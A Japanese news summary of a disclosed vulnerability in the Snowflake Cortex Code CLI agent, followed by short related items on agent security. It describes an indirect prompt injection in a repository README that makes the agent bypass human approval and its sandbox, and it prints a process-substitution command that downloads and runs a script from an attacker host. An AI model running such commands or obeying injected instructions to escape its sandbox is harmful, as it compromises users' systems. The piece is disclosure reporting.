Snowflake Cortex Code CLIの脆弱性により、サンドボックスからの脱出とマルウェアの実行が可能になりました

脆弱性の詳細
Snowflake Cortex Code CLIは、Claude CodeやOpenAIのCodexと同様に動作するコマンドラインコーディングエージェントで、SnowflakeでSQLを実行するための組み込み統合機能を備えています。リリースから2日後、Cortex Codeのコマンド検証システムに脆弱性が発見され、特別に構築された悪意のあるコマンドが、人間による承認ステップをトリガーすることなく任意のコマンドを実行し、それらのコマンドをCortex CLIのサンドボックスの外で実行することが可能になりました。
攻撃の連鎖
この攻撃は間接的なプロンプトインジェクションを介して機能します。ユーザーがCortexを開きサンドボックスを有効にした後、サードパーティのオープンソースコードベースに関するヘルプをCortexに求めます。信頼できないリポジトリのREADMEに隠されたプロンプトインジェクションにより、Cortexは危険なコマンドを実行する必要があると誤認させられます。
Cortexはプロセス置換式内のコマンドを検証できず、悪意のあるコマンドの未承認実行を許してしまいました:
cat < <(sh < <(wget -q0- https://ATTACKER_URL.com/bugbot))このコマンドは攻撃者のサーバーからスクリプトをダウンロードして実行します。このバイパスが機能した理由は以下の通りです:
- プロセス置換 <() 式内の安全でないコマンドは検証システムによって評価されなかった
- 完全なコマンドは「安全な」コマンド(この場合はcat)で始まっていた
- プロセス置換式内のコマンドは人間の承認をトリガーしなかった
サンドボックスバイパス
プロンプトインジェクションはまた、モデルを操作してサンドボックス外でのコマンド実行をトリガーするフラグを設定します。Cortexはデフォルトで、サンドボックス外でのコマンド実行をトリガーするフラグを設定でき、このインジェクションはこれを使用して悪意のあるコマンドがサンドボックスの外で実行されることを可能にします。
対策
Snowflakeのセキュリティチームはこの脆弱性を検証し対策を講じ、2026年2月28日にCortex Code CLIバージョン1.0.25で修正をリリースしました。Snowflakeの完全なアドバイザリはSnowflakeコミュニティサイトで入手可能です:https://community.snowflake.com/s/article/PromptArmor-Report---Snowflake-Response
注:この攻撃連鎖は非サンドボックスユーザーにも適用されました。ドキュメントによると、OS+通常モードでは、すべてのコマンドがユーザーの承認を求めます。サンドボックスで実行されるコマンドにはネットワークおよびファイルアクセスの制限もあります。
📖 Read the full source: HN AI Agents
👀 See Also

OpenClawのセキュリティギャップが、エージェンティック・パワー・オブ・アトーニー(APOA)仕様によって対処されました。
開発者が、OpenClawにおけるセキュリティ上の懸念に対処するため、Agentic Power of Attorney (APOA) と呼ばれるオープン仕様を公開しました。現在、エージェントはメールやカレンダーなどのサービスに、自然言語の指示のみをガードレールとしてアクセスしています。この仕様では、サービスごとの権限、時間制限付きアクセス、監査証跡、権限の取り消し、資格情報の分離を提案しています。

Blindfold: Claude Codeが.envファイルを読み取るのを防ぐプラグイン
Blindfoldは、.envファイル内の実際の秘密値をOSキーチェーンに保持し、{{STRIPE_KEY}}のようなプレースホルダーを使用することで、Claude Codeがそれらにアクセスするのを防ぐ新しいプラグインです。直接アクセス試行をブロックするフックも備えています。

悪意のあるGoogle広告がClaudeコードのインストールを狙う
「install claude code」の検索結果のトップに悪意のあるGoogle広告が表示され、ユーザーを騙して疑わしいターミナルコマンドを実行させようとしています。この広告は2026年3月15日時点でも有効で、著者はコードの実行を間一髪で回避しました。

クロードコードが23年前のLinuxカーネル脆弱性を発見
Anthropicの研究者ニコラス・カリーニは、Claude Codeを使用してLinuxカーネル内の複数のリモートで悪用可能なヒープバッファオーバーフローを発見しました。その中には23年間隠れていた脆弱性も含まれています。AIはカーネルソースツリー全体をスキャンし、最小限の監視でこれらのバグを見つけ出しました。